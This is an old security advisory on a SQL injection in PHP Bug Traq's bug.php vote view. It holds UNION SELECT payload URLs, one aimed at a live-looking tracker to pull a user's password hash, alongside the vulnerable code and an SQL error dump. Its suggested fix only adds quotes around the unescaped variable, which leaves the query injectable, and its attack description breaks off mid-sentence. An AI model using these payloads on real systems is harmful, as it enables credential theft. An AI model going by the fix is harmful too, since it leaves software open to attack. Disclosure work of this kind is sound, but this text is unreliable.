
SQL Injection in phpBT (bug.php)

 _   _                ______           _    
| | | |               |  _  \         | |   
| |_| | _____      __ | | | |__ _ _ __| | __
|  _  |/ _ \ \ /\ / / | | | / _` | '__| |/ /
| | | | (_) \ V  V /  | |/ / (_| | |  |   < 
\_| |_/\___/ \_/\_/   |___/ \__,_|_|  |_|\_\

// Information

Author: How Dark
Date:   November 13, 2004
URL:    http://www.howdark.com

Affected Software:              PHP Bug Traq
Software Version:               0.9.1
Software URL:           http://phpbt.sourceforge.net/

Attack:                 SQL Injection, allowing people to manipulate the query
                        into pulling data they should not previously be able
                        to obtain. (Such as

                        XSS, cross site scripting leaving cookie data to

Description:            bug_id variable is left open. XSS on display of id.



// Description

For viewing the votes placed on a bug, the bug_id variable is left open.



// URL

bug.php?op=viewvotes&bugid=1 union select 1,2,3/*
bug.php?op=viewvotes&bugid=1 union select 1,2,3/*%20 XSS here
http://www.phpbb.com/bugs/bug.php?op=viewvotes&bugid=1 union select 
1,user_password,3 where user_id='2'/*



// Code
[ Line 29  -  37 ]

        // vote_view() interpolates $bug_id straight into the query string with
        // no cast, quoting or escaping, so whatever arrives in the request is
        // executed as part of the SQL statement.
        function vote_view($bug_id) {
                global $u, $db, $t, $STRING;

                $t->assign('votes', $db->getAll('select login, v.created_date '.
                        'from '.TBL_AUTH_USER.' u, '.TBL_BUG_VOTE." v ".
                        "where u.user_id = v.user_id and bug_id = $bug_id ".
                        'order by v.created_date'));
                $t->wrap('bugvotes.html', 'bugvotes');
        }

// Code


// SQL Error

DB Error: syntax error
SELECT u.user_id, username as login, v.created_date FROM phpbb_users u, 
phpbt_bug_vote v WHERE u.user_id = v.user_id AND bug_id = 2864' ORDER BY 
v.created_date [nativecode=1064 ** You have an error in your SQL syntax. Check 
the manual that corresponds to your MySQL server version for the right syntax 
to use near '' ORDER BY v.created_date' at line 1]



// Fix

Find:           [ Line 34 ]     "where u.user_id = v.user_id and bug_id = $bug_id ".
Replace:        [ Line 34 ]     "where u.user_id = v.user_id and bug_id = '$bug_id' ".


